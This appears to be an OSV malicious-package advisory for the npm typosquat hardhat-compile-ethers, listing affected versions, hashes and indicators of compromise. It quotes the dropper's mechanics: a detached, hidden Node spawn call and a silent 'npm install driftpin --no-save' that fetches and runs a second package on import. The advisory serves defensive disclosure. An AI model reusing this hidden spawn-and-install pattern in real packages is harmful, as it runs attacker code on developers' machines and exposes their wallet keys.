MAL-2026-6705

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-compile-ethers/MAL-2026-6705.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6705
Published
2026-07-01T18:41:35Z
Modified
2026-07-01T19:16:50.546845631Z
Summary
Malicious code in hardhat-compile-ethers (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)

The package's main entry, dist/src/index.js, contains a payload appended after the legitimate Hardhat exports. On require/import (for example when Hardhat loads the user's config), it spawns a detached Node child, spawn(process.execPath, ['-e', code], {detached: true, stdio: 'ignore', windowsHide: true}), that runs a base64-decoded shell command to silently install a second package (npm install driftpin --no-save --silent --no-audit --no-fund), then require('driftpin') and invoke getPlugin()(). The result is attacker-controlled code executing in a detached Node process under the account of whoever installed or imported the package.

Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, console window hidden on Windows) are evasion mechanics: the child can continue after the parent exits and writes nothing to the installer's terminal. Because the install uses --no-save, driftpin is not recorded in package.json or the lockfile, so its presence in node_modules is an indicator of compromise in its own right.

The payload is absent from the TypeScript source (src/index.ts) and appears only in the published dist artifact, indicating injection after the build. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, so arbitrary code execution on import is especially damaging.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "0.4.7"
            ],
            "sha256": "180936274762437e2311a83f716cbbf9fcaaaef8e194b950bfa28192bfb44bf8",
            "modified_time": "2026-07-01T18:42:56Z",
            "source": "amazon-inspector",
            "import_time": "2026-07-01T19:11:25.632444026Z",
            "id": "IN-MAL-2026-007865"
        },
        {
            "versions": [
                "0.4.10"
            ],
            "sha256": "2852e841d953072a439342e58a63f91a6f4047c122d337ad57bc4f4adad45f81",
            "source": "amazon-inspector",
            "modified_time": "2026-07-01T18:42:38Z",
            "id": "IN-MAL-2026-007863",
            "import_time": "2026-07-01T19:11:25.404233578Z"
        },
        {
            "versions": [
                "0.4.12"
            ],
            "sha256": "3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1",
            "modified_time": "2026-07-01T18:41:35Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007856",
            "import_time": "2026-07-01T19:11:24.475165466Z"
        },
        {
            "versions": [
                "0.4.11"
            ],
            "sha256": "51a9a1265ba62d0c900be1a70b6fb28386f2e25cc3e31855fc5b3f58530cae47",
            "modified_time": "2026-07-01T18:42:18Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007861",
            "import_time": "2026-07-01T19:11:25.142169343Z"
        },
        {
            "versions": [
                "0.4.8"
            ],
            "sha256": "70318ad0a21e7e2e412adfb362788a771ff49831a01481de94c60d7903634f36",
            "modified_time": "2026-07-01T18:42:46Z",
            "source": "amazon-inspector",
            "import_time": "2026-07-01T19:11:25.528163378Z",
            "id": "IN-MAL-2026-007864"
        },
        {
            "versions": [
                "0.4.6"
            ],
            "sha256": "95bb3eefd23fcfaf7a9da242c86085f6b7d1cda8344a82a8219789beefe60c12",
            "modified_time": "2026-07-01T18:43:07Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007866",
            "import_time": "2026-07-01T19:11:25.775808651Z"
        },
        {
            "versions": [
                "0.4.5"
            ],
            "sha256": "a1d54b1992fb2f6fa590ca2b76dd65574a18a0659f43294aa2fdf0588abe4062",
            "modified_time": "2026-07-01T18:43:43Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007870",
            "import_time": "2026-07-01T19:11:26.226038725Z"
        },
        {
            "versions": [
                "0.4.4"
            ],
            "sha256": "d572224fcf90c82c0626008128d7a1fd790e480ec4c3b4fa5292eeb3d610bf81",
            "modified_time": "2026-07-01T18:43:34Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007869",
            "import_time": "2026-07-01T19:11:26.129866344Z"
        },
        {
            "versions": [
                "0.4.2"
            ],
            "sha256": "dee0fafd7c2ba309f9b3b1ae8f7e4d54c9d82c630bdbaa176044b9e054cf08c9",
            "source": "amazon-inspector",
            "modified_time": "2026-07-01T18:43:17Z",
            "id": "IN-MAL-2026-007867",
            "import_time": "2026-07-01T19:11:25.903639151Z"
        },
        {
            "versions": [
                "0.4.0"
            ],
            "sha256": "55a890434cfd92fb846ba508acebf110f286a083dc029651ebecb781528e6f39",
            "modified_time": "2026-07-01T18:43:59Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007872",
            "import_time": "2026-07-01T19:11:26.500370955Z"
        },
        {
            "versions": [
                "0.4.3"
            ],
            "sha256": "845a969efc54f4b45826b4bd051aa1adea7c2a983ce97e0665e0c7107f4f2ce3",
            "modified_time": "2026-07-01T18:43:25Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007868",
            "import_time": "2026-07-01T19:11:26.029254479Z"
        },
        {
            "versions": [
                "0.0.1"
            ],
            "sha256": "c807ea26446e2a048c154c7a3c035c22db3c42ceede57a307195256a3f11e540",
            "modified_time": "2026-07-01T18:43:50Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007871",
            "import_time": "2026-07-01T19:11:26.358013817Z"
        },
        {
            "versions": [
                "0.4.9"
            ],
            "sha256": "d1e4d2af59e7b9e792f78d9335e437080b45295155a778e9d336e23f809e325f",
            "modified_time": "2026-07-01T18:42:31Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007862",
            "import_time": "2026-07-01T19:11:25.289124822Z"
        }
    ]
}
References
Credits

Affected packages

npm / hardhat-compile-ethers

Package

Name
hardhat-compile-ethers
Purl
pkg:npm/hardhat-compile-ethers

Affected ranges

Affected versions

0.*
0.0.1
0.4.0
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6
0.4.7
0.4.8
0.4.9
0.4.10
0.4.11
0.4.12

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "hardhat-compile-ethers-0.4.7.tgz",
            "hashes": {
                "sha512_sri": "sha512-jZX1Kng+W6pbRo0AaYeOa9T9Pw2I3jfP4IS+VPjc2btcfG4qr4IH9o6J352wbyVbVrWO0XDDpb8FfJTaADBneg==",
                "sha1": "e718d781b11897329c9747c5fd57a1677ea24110"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "7de1080e1a3fdcfcedbe49bc8d587fb856f3bfc06d8bdc1750f40228fcf45f61",
            "path": "dist/src/index.js",
            "tlsh": "e751e2a32797a1302b370fadcb0b1c5663a352932ad891a0f7ed95121f8218951b39c9"
        },
        {
            "sha256": "d5cdd23b692a6e0a213c2a889a398195837f2033e748241c69dee5257beb6dd1",
            "path": "package.json",
            "tlsh": "41318960cc19cd2307d85595ac7a429361649a470ca6fc2c73a52bbf4f0c2af21b9abd"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-compile-ethers/MAL-2026-6705.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]